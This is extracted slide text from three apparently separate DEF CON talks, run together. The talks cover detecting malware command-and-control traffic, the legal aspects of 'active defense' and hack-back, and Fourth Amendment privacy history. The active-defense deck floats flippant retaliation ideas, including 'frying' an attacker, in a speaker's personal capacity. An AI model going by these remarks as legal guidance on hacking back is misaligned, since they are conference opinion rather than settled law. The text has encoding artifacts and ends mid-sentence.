unsupported configurations. − Try to limit Trusted CA certs wherever possible, especially on SSL Proxy and on endpoints. This can help to mitigate malware being able to connect to suspicious systems signed by low trust partners. − Restrict SSL MiTM to using strong ciphers to potentially break malware using weak / outdated ciphers. Detect/Block Known Bad SSL Certs − Where possible, use IDS or other technology to detect known malicious SSL certs which provide high fidelity indicators of an attack (even if SSL MiTM isn’t possible) − Record TLS Certificates observed on network with tools like Suricata or Bro. − Abuse.CH! 34 Defense Mechanisms Part 4 Heuristics / Anomaly Detection − Heuristics/Pattern matching is not a perfect catch all for identifying suspicious activity due to highly evasive techniques, especially when it can be corroborated with other IOC’s. − One high fidelity indicator of compromise can be to examine DNS data to try to identify domain generation algorithms used by modern malware. − Some IDS can also identify this activity, but placement is very important because it needs to be between the client and the DNS server, otherwise all attacks will look like they are coming from the DNS server. Network Anomaly Detection: − By itself a low fidelity indicator and FP prone, when combined with other techniques, anomaly detection can provide valuable insight. Particularly when network based steganography and evasion techniques are used, a good IDS anomaly engine will light up like a Christmas tree. 35 Defense Mechanisms: Part 5 Review, Tune, and Listen to your Security Infrastructure! (Give a shit) − As we’ve seen with many high profile breaches, it is often the case that malicious activity is detected, but it isn’t acted upon. − Most off the shelf malware and attacks provide many IOC’s to key on which can be detected by freely available software and systems. − There are commercial and open source solutions available that can help to solve the problem of the signal to noise, auxiliary endpoint verification, and end to end IR containment. 36 Most Importantly Get Involved! − Contribute to ET Open, Free Open Source IDS Rules for Suricata and Snort – http://doc.emergingthreats.net/bin/view/Main/EmergingFAQ – emerging@emergingthreats.net − Contribute to OISF / Suricata Development – https://oisf.net/ – https://suricata-ids.org/ 37 Summary − In modern computer security, it’s not a matter of if, but when, and what they will take, and how much it will cost you to deal with it. − The attack surface is simply too massive, to put all of your hopes in the fact that you might be able to keep malware out. − In taking the fight to the attackers, we need to be smart, and to holistically detect breaches. Not only on the initial phases, but perhaps where the attackers are most exposed and we have the most defensive capabilities to detect them by detecting the C2 channels. − As we continue to up our game, we should expect that the malicious actors will do the same, and come up with even more creative ways to leverage the same technology which can be used for incredible good for their own malicious purposes. − But at the very least, we can keep them on their game, and further tip the economics of hacking by making their job that much harder. We’ll do it by exploiting them for a change; at their weakest point, the command and control channel. 38 Thank You!
Legal Aspects of Full Spectrum Computer Network (Active) Defense def con 2013 Agenda Disclaimer Errata Self Defense in Physical World Applying Self Defense to Computer Network Defense Technology Pen Testing/Red Teaming Intelligence/Open Source IA and Training/Polices Information Control Active Defense Deception Operating on The ―Net‖ Agenda I have an active defense scenario. Disclaimer Disclaimer - aka the fine print Joint Ethics Regulation Views are those of the speaker I’m here in personal capacity Don’t represent view of government Disclaimer required at beginning of presentation. All material - unclassified U.S. Law And Computer Network Operations 1 Office of Cybersecurity & Communications Future Strategy November 9, 2009 Oh yeah, 1986 CFAA Definition of Special Skills Special skill – a skill not possessed by members of the general public and usually requiring substantial education, training or licensing. Examples – pilots, lawyers, doctors, accountants, chemists and demolition experts. Not necessary to have formal education or training Skills can be acquired through experience or self-tutelage. Critical question is whether the skill set elevates to a level of knowledge and proficiency that eclipses that possessed by the general public. United States v. Prochner, 417 F3d. 54 (D. Mass. July 22, 2005) In re Innovatio IP Ventures, LLC Patent Litigation, - - - - F.Supp.2d - - - , 2013 WL 427167 (N.D. Ill. Feb. 4, 2013) Patent Owners of wireless Internet technology Sue commercial users of wireless Internet technology Alleging by making wireless Internet available to customers or using it to manage internal processes, users infringed various claims of 17 patents. Plaintiff Innovatio has sued numerous hotels, coffee shops, restaurants, supermarkets, and other commercial users of wireless internet technology located throughout the United States (collectively, the ―Wireless Network Users‖). In re Innovatio IP Ventures, LLC Patent Litigation & ECPA In re Innovatio IP Ventures, LLC Patent Litigation, 886 F.Supp.2d 888 (N.D. Ill. Aug. 22, 2012) Decision Data packets sent over unencrypted wireless networks Readily accessible to general public using basic equipment Patent owner's proposed protocol for sniffing accessed only communications sent over unencrypted networks available to general public using packet capture adapters Falls under exception to Wiretap Act ―electronic communication is readily accessible to the general public.‖ Evidence obtained using protocol admissible at patent infringement trial with proper foundation. 18 U.S.C.A. § 2511(2)(g)(i). In re Innovatio IP Ventures, LLC Patent Litigation & ECPA In re Innovatio IP Ventures, LLC Patent Litigation, 88 F.Supp.2d 888 (N.D. Ill. Aug. 22, 2012) Innovatio intercepting Wi–Fi communications Riverbed AirPcap Nx packet capture adapter (only $698.00) Software (wireshark) available for download for free. Laptop, software, packet capture adapter- Any member of general public within range of an unencrypted Wi–Fi network can intercept. Many Wi–Fi networks provided by commercial establishments are unencrypted and open to such interference from anyone with the right equipment.  In light of the ease of ―sniffing‖ Wi–Fi networks, the court concludes that the communications sent on an unencrypted Wi–Fi network are readily accessible to the general public. In re Innovatio IP Ventures, LLC Patent Litigation & ECPA In re Innovatio IP Ventures, LLC Patent Litigation, 886 F.Supp.2d 888 (N.D. Ill. Aug. 22, 2012) Decision The public's lack of awareness of the ease with which unencrypted Wi–Fi communications can be intercepted by a third party is, however, irrelevant to a determination of whether those communications are ―readily accessible to the general public.‖ 18 U.S.C. 2511(2)(g)(i) In re Innovatio IP Ventures, LLC Patent Litigation & ECPA Legal Aspects of Full Spectrum Computer Network (Active) Defense Def con topic Is it Relevant?? Defending life and liberty and protecting property, twenty-one state constitutions expressly tell us, are constitutional rights, generally inalienable, though in some constitutions merely inherent or natural and God-given. Eugene Volokh, State Constitutional Rights of Self-Defense and Defense of Property, Texas Review of Law and Politics, Spring 2007 Self Defense - History Self-defense and defense of property are long- recognized legal doctrines, traditionally protected by the common law. Eugene Volokh, State Constitutional Rights of Self-Defense and Defense of Property, Texas Review of Law and Politics, Spring 2007 Self Defense - History Common Law doctrine – Trespass to Chattel Recover actual damages suffered due to impairment of or loss of use of property. May use reasonable force to protect possession against even harmless interference. The law favors prevention over post-trespass recovery, as it is permissible to use reasonable force to retain possession of chattel but not to recover it after possession has been lost. Self Defense - History Intel v. Hamidi, 71 P. 2d. (Cal. Sp. Ct. June 30, 2003) Right to exclude people from one’s personal property is not unlimited. Self-defense of personal property one must prove in a place right to be acted without fault used reasonable force reasonably believed was necessary to immediately prevent or terminate other person's trespass or interference with property lawfully in his possession. Self Defense - History Moore v. State, 634 N.E. 2d. 825 (Ind. App. 1994) and Pointer v. State, 585 N.E. 2d. 33 (Ind. App. 1992) The common-law right to protect property has long generally excluded the right to use force deadly to humans. Eugene Volokh, State Constitutional Rights of Self- Defense and Defense of Property, Texas Review of Law and Politics, Spring 2007 Self Defense - History Common Law Doctrine – Trespass to Chattel May use reasonable force to protect possessions against even harmless interference. Prevention over post-trespass recovery Self-defense of personal property in a place right to be acted without fault used reasonable force reasonably believed was necessary to immediately prevent or terminate other person's trespass or interference with property lawfully in his possession. Self Defense - History Building the Case of Reasonableness Defense of Property Conduct constituting an offense is justified if: (1) an aggressor unjustifiably threatens the property of another, and (2) the actor engages in conduct harmful to the aggressor: (a) when and to the extent necessary to protect the property, (b) that is reasonable in relation to the harm threatened. Full Spectrum Computer Network Defense Building the Case of Reasonableness Measures Done to Secure and Defend Technology Intelligence/Situational Awareness IA/Policies/Training Information Control Active Defense Deception Recovery Operations ―Stop the Pain‖ Full Spectrum Computer Network Defense Building the Case of Reasonableness What was missing from previous slide and goes directly to reasonableness PREVIOUS & ONGOING COORDINATION WITH LAW ENFORCEMENT AGENCIES Full Spectrum Computer Network Defense Building the Case of Reasonableness Measures Done to Secure and Defend Technology Intelligence/Situational Awareness IA/Policies/Training Information Control Active Defense Deception Recovery Operations ―Stop the Pain‖ Full Spectrum Computer Network Defense Building the Case of Reasonableness Measures Done to Secure and Defend Technology Intelligence/Situational Awareness IA/Policies/Training Information Control Active Defense Deception Recovery Operations ―Stop the Pain‖ Full Spectrum Computer Network Defense Technology Firewalls Intrusion Detection Systems Intrusion Prevention Systems Real Time Network Awareness SSL Proxy Logging/Monitoring Host (accounts, processes, services) Networks (flows, connections, stat) Honeypots/Honeynets/Honeytokens To Legally Intercept Communications, Exception to Wiretap Act Must Apply Party to the Communication or Consent of a Party to the Communication Provider Exception (System Protection) Technology Consent Where there is a legitimate expectation of privacy, consent provides an exception to the warrant and probable cause requirement. A computer log-on banner, workplace policy, or user agreement may constitute user consent to a search. See United States v. Monroe, 52 M.J. 326, 330 (C.A.A.F. 1999) Technology Wiretap Statute: Rights or Property Exception 18 U.S.C. § 2511(2)(a)(i) A provider ―may intercept or disclose communications on its own machines ―in the normal course of employment while engaged in any activity which is a necessary incident to . . . the protection of the rights or property of the provider of that service.‖ Generally speaking, the rights or property exception allows tailored monitoring necessary to protect computer system from harm. See U.S. v McLaren, 957 F. Supp 215, 219 (M.D. Fla. 1997). Technology Generally speaking, the rights or property exception allows tailored monitoring necessary to protect computer system from harm. Computer Network Security & Defense See U.S. v McLaren, 957 F. Supp 215, 219 (M.D. Fla. 1997). Technology Intellectual Property Trade Secrets Research & Development The Crown Jewels Air Gap Beacons Beacons Pen Testing/Red Teaming Spear Phishing Lanham Act 15 U.S.C. §§ 1051 et seq National system of trademark registration Protects owners of federally registered marks against the use of similar marks if such use is likely to result in consumer confusion, or if the dilution of a famous mark is likely to occur. Pen Testing/Red Teaming Spear Phishing Lanham Act 15 U.S.C. §§ 1051 et seq Dilution The use of a mark or trade name in commerce sufficiently similar to a famous mark that by association it reduces, or is likely to reduce, the public’s perception that the famous mark signifies something unique, singular or particular. Intelligence/Situational Awareness Open Source Intelligence US-CERT Commercial Intelligence Provider Active Business Intelligence Competitive Intelligence v. Economic Espionage Intelligence/Situational Awareness The Economic Espionage Act of 1996 (EEA), 18 U.S.C. §§ 1831-39 Protects proprietary economic information makes some trade secret theft a crimes. Congress enacted for ―a systematic approach to the problem of economic espionage.‖ Designed to reflect the importance "intangible assets" and like trade secrets in the "high- technology, information age." Intelligence/Situational Awareness The Economic Espionage Act of 1996 (EEA), 18 U.S.C. §§ 1831-39 Section 1831 Economic Espionage Section 1832 Theft of Trade Secrets Obtaining trade secret without authorization Copy, altered or transmitted a trade secret without authorization Received a trade secret knowing information was stolen or obtained without authorization. Intelligence/Situational Awareness The Economic Espionage Act of 1996 (EEA), 18 U.S.C. §§ 1831-39 See Douglas Nemec and Kristen Voorhees, Recent amendment to the Economic Espionage Act extends protection against misappropriation, found at http://newsandinsight.thomsonreuters.com/Legal/Insight/ 2013/02_February/Recent_amendment_to_the_Economic _Espionage_Act_extends_protection_against_misapprop riation/ Intelligence/Situational Awareness The Economic Espionage Act of 1996 (EEA), 18 U.S.C. §§ 1831-39 Broad and applies to more than just intentional theft. Can be a significant hazard for companies that legitimately receive the confidential information of another company. Some lawful methods for gathering business intelligence or ―research and development leads‖ may in fact constitute acts of trade secret misappropriation. Trade secret can be virtually any type of information, including combinations of public information. Douglas Nemec and Kristen Voorhees, Recent amendment to the Economic Espionage Act extends protection against misappropriation, found at http://newsandinsight.thomsonreuters.com/Legal/Insight/2013/02_- _February/Recent_amendment_to_the_Economic_Espionage_Act_ex tends_protection_against_misappropriation/ Intelligence/Situational Awareness Whether the information was a trade secret is the crucial element that separates lawful from unlawful conduct. Possession of open-source or readily ascertainable information for the benefit of a foreign government is clearly not espionage. The essence of economic espionage is the misappropriation of trade secret information for the benefit of a foreign government. United States v. Chung, 633 F.Supp. 2d. 1134 (C.D. Cal. July 16, 2009) Intelligence/Situational Awareness William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012) Intelligence/Situational Awareness Firms routinely gather publicly available or ―open- source‖ information about rivals a lawful practice known as competitive intelligence. Competitive intelligence is the ethic and lawful application of industry and research expertise to analyze publicly available information on rivals and to produce actionable intelligence that supports informed and strategic business decisions. William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Strategic and Competitive Intelligence Professionals, found at http://www.scip.org/content.cfm?itemnumber=2214&& navItemNumber=492 Intelligence/Situational Awareness Desired Information Research Plans R&D Data Product Design Marketing Strategies Cost Structures & Pricing Strategies William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Chris Carr & Larry Gorman, The Revictimization of Companies by the Stock Market who Report Trade Secret Theft Under the Economic Espionage Act, 57 Bus. Law 25 (2001) Intelligence/Situational Awareness Common competitive intelligence methods Data mining Patent tracking Psychological modeling of rival executive Trade shows Monitoring mass media Conversations with a rival’s customers, partners, and employees. William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Susan W. Brenner & Anthony C. Crescenzi, State Sponsored Crime: The Futility of the Economic Espionage Act, 28 Hous.J. Int’l L. 389 (2006) Intelligence/Situational Awareness Competitive intelligence does not connote misappropriation by theft, deception, or otherwise of proprietary information or trade secrets. Focus on open source public information. Shareholders reports Advertising Sales literature Press releases, news stories, published interviews William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Anthony J. Dennis, Assessing the Risks of Competitive Intelligence Activities under the Antitrust Laws, 46 S.C.L. Rev. 263 (1995)(differentiating CI from illegal information gathering activities). Intelligence/Situational Awareness Competitive intelligence that raises ethical questions Appropriating documents misplaced by rivals (iPhone?) Overhearing rival executives discussing strategy (Misplaced Trust & Third Party Doctrine) Hiring employees away from rivals ―Dumpster diving‖ in rival’s trash receptacles. William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Chris Carr & Larry Gorman, The Revictimization of Companies by the Stock Market who Report Trade Secret Theft Under the Economic Espionage Act, 57 Bus. Law 25 (2001)(defining lawful but unethical CI activities); Victoria Sind-Flor, Industry Spying Still Flourishes, Nat’l L., Mar. 29, 2000) Intelligence/Situational Awareness Methods of Economic Espionage Electronic eavesdropping Surveillance of rival executives and scientists Social Engineering Bribing employees or vendors Planting ―moles‖ in rival firms Hacking and stealing computers Cybertheft of data Outright stealing trade secrets in documentary, electronic, and other formats. William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Chris Carr & Larry Gorman, The Revictimization of Companies by the Stock Market who Report Trade Secret Theft Under the Economic Espionage Act, 57 Bus. Law 25 (2001 Intelligence/Situational Awareness Methods of Economic Espionage Electronic eavesdropping Surveillance of rival executives and scientists Social Engineering Bribing employees or vendors Planting ―moles‖ in rival firms Hacking and stealing computers Cybertheft of data Outright stealing trade secrets in documentary, electronic, and other formats. William Bradford, The Creation and Destruction of Price Cartels: An Evolutionary Theory, 8 Hastings Bus. L.J. 285 (Summer 2012)(citing, Chris Carr & Larry Gorman, The Revictimization of Companies by the Stock Market who Report Trade Secret Theft Under the Economic Espionage Act, 57 Bus. Law 25 (2001) Intelligence/Situational Awareness United States v. Aleynikov, 676 F.3d. 71 (2d Cir (SDNY) Apr. 11, 2012) Sergey Aleynikov, was a former computer programmer and vice president in Equities at Goldman Sachs. Responsible for developing computer programs used in the bank’s high-frequency trading (HFT) system. HFT system used statistical algorithms to analyze past trades and market developments. System was proprietary information and protected by various security measures to keep it secret. Sergey makes $400K, highest paid of 25 programmers in his group. Hired at competitor at over $1M Intelligence/Situational Awareness United States v. Aleynikov, 676 F.3d. 71 (2d Cir (SDNY) Apr. 11, 2012) Last day of employment Just before going away party Aleynikov encrypted and uploaded to a server in Germany 500,000 lines of source code. After upload, deleted the encryption program and history of his computer commands. Later downloads source code from the German server to his home computer in the United States, flew to Chicago, Illinois, and brought the source code with him to a meeting with a Goldman Sachs competitor. Intelligence/Situational Awareness United States v. Aleynikov, 676 F.3d. 71 (2d Cir (SDNY) Apr. 11, 2012 Defendant was convicted of stealing and transferring proprietary computer source code of his employer's in violation of National Stolen Property Act (NSPA) and Economic Espionage Act (EEA) Aleynikov appealed arguing that Section 1832(a) only applies to trade secrets ―relating to tangible products actually sold, licensed or otherwise distributed.‖ The source code, he argued, was never intended to be placed in interstate or foreign commerce. Intelligence/Situational Awareness United States v. Aleynikov, 676 F.3d. 71 (2d Cir (SDNY) Apr. 11, 2012 Defendant was convicted of stealing and transferring proprietary computer source code of his employer's in violation of National Stolen Property Act (NSPA) and Economic Espionage Act (EEA) Aleynikov appealed arguing that Section 1832(a) only applies to trade secrets ―relating to tangible products actually sold, licensed or otherwise distributed.‖ The source code, he argued, was never intended to be placed in interstate or foreign commerce. The Court of Appeals held that: computer source code did not constitute stolen ―goods,‖ ―wares,‖ or ―merchandise‖ within meaning of NSPA and defendant's theft of source code did not violate EEA. Intelligence/Situational Awareness IA Policies/Training IA Training Banners User Agreements Annually/Semi/Quarterly Enforcement Employee discipline for violating? Information Control Access lists Encryption DRM Electronic Mail Control Active Defense Deception Active Defense Deception & The SEC Section 21(a) of the Exchange Act authorizes the Commission to investigate violations of the federal securities laws, and, in its discretion, ―to publish information concerning any such violations.‖ Securities and Exchange Act of 1934, Release No. 69279/April 2, 2013, Report of investigation Pursuant to Section21(a) of the Securities Exchange Act of 1934: Netflix, Inc., and Reed Hastings, found at http://www.sec.gov/litigation/investreport/34-69279.pdf Active Defense - Deception Regulation full disclosure requires companies to distribute material information in a manner reasonably designed to get that information out to the general public broadly and non-exclusively. It is intended to ensure that all investors have the ability to gain access to material information at the same time. Securities and Exchange Act of 1934, Release No. 69279/April 2, 2013, Report of investigation Pursuant to Section21(a) of the Securities Exchange Act of 1934: Netflix, Inc., and Reed Hastings, found at http://www.sec.gov/litigation/investreport/34-69279.pdf Active Defense - Deception Active Defense - Deception A company makes public disclosure when it distributes information ―through a recognized channel of distribution.‖ So if deception Documents on internal computer systems No intent of being made public Stolen Documents leaked to media Company has not made a public disclosure SEC violations or an investigation? Active Defense Deception Examples RFPs Bid Preparation Blue Prints/Designs Minor Defects Major Defects - Cause Harm? Business Plans/Financial Records Mergers & Acquisitions Liability to Third Parties Mentioned in Deception Documents Active Defense – Recovery Operations Active Defense – Recovery Operations Recovery Operations An Example of Clark's Law FTP Server Intruder Innocent Third Party Victim Active Defense – Recovery Operations Intruder FTP Server Intruder Innocent Third Party Victim Active Defense – Recovery Operations Innocent Third Party Issues 1. Logs a. Third Party b. FTP Server c. Third Party FTP Server Intruder Innocent Third Party Victim Active Defense – Recovery Operations l705 BDC 0 g858 421.1 808 Active Defense – Recovery Operations Recovery Operations Assume good CNE Active Defense – Stop the Pain The Part with a lot of audience participation So what do you want to do What ―pain‖ do you need to stop? DDOS, ???? C&C bots ???? Active Defense – Stop the Pain ―Stop the Pain‖ Good CNE C2 Server Intruder Active Defense – Stop the Pain Victim If I fry the guy who is attacking me - Who is going to sue me, the guy attacking me!?! Active Defense Active Defense Hack Back United States v John Doe, et al., No. 3:11 CV 561 (VLB), Dt. Conn, June 16, 2011 TRO ―[T]here are special needs, including to protect the public and to perform community caretaking functions, that are beyond the normal need for law enforcement and make the warrant and probable-cause requirement of the Fourth Amendment impracticable‖ ―the requested TRO is both minimally intrusive and reasonable under the Fourth Amendment.‖ Hack Back United States v John Doe, et al., No. 3:11 CV 561 (VLB), Dt. Conn, June 16, 2011 The Coreflood botnet Five C & C servers seized 29 domain names used to communicate with the C & C servers If C & C servers do not respond, the existing Coreflood malware continues to run on the victim’s computer, collecting personal and financial information. TRO authorizes government to respond to requests from infected computers in the United States with a command that temporarily stops the malware from running on the infected computer.
WTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael “theprez98” Schearer DEFCON 19 Las Vegas, NV Michael “theprez98” Schearer • Founder and Owner, Leverage Consulting & Associates • 8+ years in the U.S. Navy as an EA-6B Prowler Electronic Countermeasures Officer – Veteran of aerial combat missions over Afghanistan and Iraq – Spent 9 months on the ground in Iraq as a counter-IED specialist • Founding member of Church of WiFi and Unallocated Space, and father of four Why you should be skeptical • I am not a lawyer • My presentation is (both) unintentionally and intentionally biased by my own beliefs • This isn’t a political presentation, but it is inevitably influenced by political issues • Bottom line: Don’t take my word for it; read the source material and make up your own mind! WTF HAPPENED TO THE CONSTITUTION? Part I: History “The Right to Privacy” • What is it? • Where does it come from? History (1/2) • Magna Carta (1215) • Divine Right of Kings (~1600-88) • Semayne’s Case (1604) • Lex, Rex (1644) • The Glorious Revolution (1688) • English Bill of Rights (1689) • Paxson’s Case (1760) • William Pitt, Earl of Chatham (1763) • Wilkes v. Wood (1763), Entick v. Carrington (1765) History (2/2) • Malcom Affair (1766) • Virginia Declaration of Rights (1776) • State Constitutions • State Ratifying Conventions • First Congress (1789-91) • Bill of Rights Ratification (1791) • Fourteenth Amendment (1868) Magna Carta (1215) • Proclamation by King John of certain liberties • King’s will was not arbitrary • “NO Freeman shall be taken or imprisoned, or be disseised of his...Liberties...but by...the Law of the land.” Divine Right of Kings (1600-88) • Monarch derives his right to rule from God • Not subject to the people, laws, or even the Church • Theory was used to justify absolute monarchism Semayne’s Case (1604) • Gresham and Berisford--joint tenants • Berisford died and left some papers to Semayne • Sheriff of London, with a valid writ, entered the house by breaking down the doors “the house of every one is to him as his castle and fortress, as well for his defence against injury and violence as for his repose.” -- Sir Edward Coke Lex, Rex (1644) • The Law and the Prince (or, The Law is King) • Written by Scottish minister Samuel Rutherford • Defends the rule of law, limited government and constitutionalism • Attacking royal absolutism and the divine right of kings • Charged with high treason • Book was burned in Edinburgh, St. Andrews, and Oxford The Glorious Revolution (1688) • Overthrow of King James II of England by English Parliamentarians and William of Orange • The end of absolute rule by the monarchy • Drafting of the English Bill of Rights English Bill of Rights (1689) • No royal interference with the law • No taxation by Royal Prerogative • Civil courts (not Church courts) • Freedom of petition • No standing army • Right to bear arms for their own defense • No cruel or unusual punishments, or excessive bail Paxson’s Case (1760) • Writs of assistance • The death of King George II in October 1760 • Charles Paxson, British customs official • James Otis, Jr., Boston attorney • Outcome William Pitt, Earl of Chatham (1763) "The poorest man may in his cottage bid defiance to all the force of the crown. It may be frail— its roof may shake—the wind may blow through it—the storm may enter, the rain may enter—but the King of England cannot enter—all his force dares not cross the threshold of the ruined tenement.” Wilkes v. Wood (1763), Entick v. Carrington (1765) • John Wilkes, “radical” journalist (The North Briton) • John Entick, “radical” journalist (The Monitor) • Lord Camden condemned the practice of general warrants Malcom Affair (1766) • Search of Daniel Malcom’s home (and business) in Boston on a writ of assistance • Malcom permitted the search, but not of a locked cellar • Officials returned with a specific warrant, but Malcom locked his house • Malcom and Otis provoking another lawsuit? Virginia Declaration of Rights (1776) X That general warrants, whereby any officer or messenger may be commanded to search suspected places without evidence of a fact committed, or to seize any person or persons not named, or whose offense is not particularly described and supported by evidence, are grievous and oppressive and ought not to be granted. State Constitutions Of the ten states that adopted constitutions between the Declaration of Independence and the Constitution: – Three expressed condemned general warrants (Virginia, Maryland, North Carolina) – Three included provisions similar to the eventual language of the Fourth Amendment (Massachusetts, Pennsylvania, Vermont) – Delaware, New York and New Jersey did not include any provisions resembling the eventual Fourth Amendment, but all three states did explicitly include provisions that incorporated English common law State Ratifying Conventions • Patrick Henry’s speech, June 24, 1788, enumerated rights (Virginia) • New York • Rhode Island First Congress (1789-91) • Enumerated rights vs. limited powers • Madison’s first draft • Bill of Rights ratification (1791) Fourteenth Amendment (1868) • One of three Reconstruction Amendments • Legitimize the Civil Rights Act of 1866 • Sought to overrule Dred Scott v. Sandford (1857) • Sought to overrule Barron v. Baltimore (1833) and apply the Bill of Rights to the states – Privileges or Immunities Clause (Slaughterhouse Cases) – Due Process Clause (Wolf v. Colorado, 1949; Mapp v. Ohio, 1961) WTF HAPPENED TO THE CONSTITUTION? Part II: The Fourth Amendment Fourth Amendment The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized. Search by government? Reasonably expect privacy? Standing? Was there a warrant? Was warrant proper and executed correctly? Search Valid No? Police good faith? Inevitable Discovery? Independent source? Search Valid No? Warrant Exception? *Incident to arrest *Auto search *Plain view *Consent *Stop & frisk *Hot pursuit/evanescent evidence Search Valid Key questions • Was the action performed by the government? • Was there a reasonable expectation of privacy? • Was there a warrant? • Was the warrant proper and executed correctly? Was the action performed by the government? • Someone acting in an official capacity on behalf of the federal or state government • Can be a federal or state official, or a private individual acting on behalf of the federal or state government Was there a reasonable expectation of privacy? • A government intrusion only constitutes a “search” when there is a reasonable expectation of privacy • Otherwise, it is not a search and the Fourth Amendment does not apply Reasonable expectation of privacy 1. Actual expectation of privacy 2. Your expectation is reasonable to society as a whole Reasonable expectation of privacy Reasonable expectation of privacy Reasonable expectation of privacy • Inside / outside (home) • Inside / outside (container) • Inside / outside (body) • Content / non-content (digital) • Private / shared (social network) Was there a warrant? • Consent • Plain view • Open fields • Curtilage • Exigent circumstances • Motor vehicle Was the warrant proper and executed correctly? • Proper: – Probable cause – Particularity – Neutral magistrate • Signed under oath • PC not stale/out of date • Execution: – Timely / Time of day – Knock and announce – Search only areas listed in warrant – Seize only items listed in warrant & plain view Exceptions to the Exclusionary Rule • Good faith • Inevitable discovery • Independent source • Intervening acts Burden of proof • Reasonable suspicion • Probable cause • Preponderance of the evidence • Beyond reasonable doubt WTF HAPPENED TO THE CONSTITUTION? Part III: Things That Should Piss You Off Things that should piss you off 1. Administrative searches 2. Administrative warrants and subpoenas 3. Public surveillance 4. Schools and students’ rights 5. Legislators, judges and technology 6. It’s your fault, too Administrative searches • What is it? A search conducted as part of a general regulatory scheme • Why is it problematic? Generally, administrative searches are considered reasonable if they are no more intrusive or intensive than necessary and thus not subject to further Fourth Amendment scrutiny; pre-textual for criminality • What can we do about it? Demonstrate that searches are increasingly intrusive in light of current technology • Verdict: tough row to hoe Administrative warrants and subpoenas • What is it? Authorizes searches for regulatory schemes, or to obtain “non- content” information • Why is it problematic? Some forms of administrative warrants or subpoenas, such as National Security Letters, have very little judicial oversight; PC not required? • What can we do about it? Continue to support efforts to publicize abuse • Verdict: Doe v. Ashcroft began to rollback NSLs; but more work must continue Public surveillance • What is it? Surveillance cameras, GPS tracking, marking our every move • Why is it problematic? Long term surveillance, technology increases the intrusion even in public spaces; amassing of data without suspicion • What can we do about it? Use privacy- enhancing technologies to our advantage; publicize known and obvious abuses • Verdict: Are we too far down the slippery slope? Schools and students’ rights • What is it? Students are often denied the same basic rights as other citizens • Why is it problematic? While there are legitimate concerns about disrupting an educational environment, this reason is often used as a pretext to invade students’ civil rights • What can we do about it? Parents must continue to stay informed about their children and stand up for their rights • Verdict: Students rights have eroded since Tinker Legislators, judges and technology • What is it? Many legislators and judges show little aptitude for understanding technology that • Why is it problematic? Technologically incompetent legislators write poor laws, judges make poor decisions; ultimately, the justice system becomes undermined • What can we do about it? Technology education, technology courts, run for office yourself? • Verdict: an uphill battle, but one worth fighting Specialty courts • Bankruptcy Courts • U.S. Court of International Trade • U.S. Court of Federal Claims • Court of Appeals for Veterans’ Claims • U.S. Court of Appeals for the Armed Forces • Technology Courts? It’s your fault, too • What is it? We share a lot of information voluntarily • Why is it problematic? By openly sharing so much information, we lower the overall societal expectation of privacy and thus subject ourselves to more governmental intrusion • What can we do about it? Just because we can share, doesn’t mean we have to • Verdict: Another case where we might be too far down the slope to reverse course Voluntary disclosure of privacy WTF HAPPENED TO THE CONSTITUTION? Some Final Observations Unresolved questions • Is email privacy protected by the Fourth Amendment? [Warshak v. United States] • Is warrantless GPS tracking constitutional? [United States v. Jones] • Can your cell phone be searched during a traffic stop? Is a warrant required to search it after an arrest? [People v. Diaz, CA and State v. Smith, OH] • Can the government force you to reveal a password for an encrypted device? [United States v. Fricosu] Is privacy dead? • Perhaps not yet, but it’s dying fast • We can reclaim privacy by protecting our information and refusing to share so much voluntarily, and in turn increasing society’s expectation of privacy • Increase awareness by shining the light on governmental intrusions into privacy rights • Shift our focus A new focus • Do you have the right to wear red hats on Wednesdays? Why or why not? Or should we ask the question another way? • Enumerated powers, Ninth Amendment, Tenth Amendment, Fourteenth Amendment • Islands of liberty in a sea of power, or islands of power in a sea of liberty? • Only you can make a difference for you WTF HAPPENED TO THE CONSTITUTION? Questions Sources and References Assault on Privacy [http://assaultonprivacy.blogspot.com] Criminal Procedure Flow Charts [http://www.scribd.com/doc/23861708/Crim-Pro-Flowcharts] Search and Seizure Flowchart [http://jyates.myweb.uga.edu/CP_Midterm_Review.ppt] Federal Court Rules That TSA ‘Naked Scans’ Are Constitutional *http://blogs.forbes.com/kashmirhill/2011/07/15/federal-court-rules- that-tsa-naked-scans-are-constitutional/] The SWAT Team Would Like to See Your Alcohol Permit [http://reason.com/archives/2010/12/13/the-swat-team-would-like-to-se] Minnesota Tenants Challenge Nosy Housing Inspectors [http://reason.com/blog/2010/12/29/minnesota-tenants-challenge-no] National Security Letter [https://www.eff.org/files/filenode/ia_v_mukasey/Nov2007_NSL.pdf] Twitter Unseal Order [http://www.salon.com/news/opinion/glenn_greenwald/2011/01/07/twitter/Twitter_Unsealing_Order.pdf] DOJ's "hotwatch" real-time surveillance of credit card transactions [http://paranoia.dubfire.net/2010/12/dojs-hotwatch-real-time- surveillance-of.html] Chicago's Video Surveillance Cameras Report [http://il.aclu.org/site/DocServer/Surveillance_Camera_Report1.pdf] Supreme Court to Decide Constitutionality of Warrantless GPS Monitoring [http://www.wired.com/threatlevel/2011/06/warrantless- gps-monitoring-scotus/] Using hidden cameras to catch car thieves [http://articles.baltimoresun.com/2011-06-22/news/bs-md-ho-trooper-death-license- reader20110525_1_license-plate-reader-car-thieves-motorcycle] 'Bong Hits 4 Jesus': Student Protest Goes to Supreme Court [http://abcnews.go.com/US/story?id=2953653&page=1] Are Student Cell Phone Records Discoverable? [http://www.law.com/jsp/lawtechnologynews/PubArticleLTN.jsp?id=1202503300012&slreturn=1&hbxlogin=1] Texas 'Calorie Camera' Will Track How Much 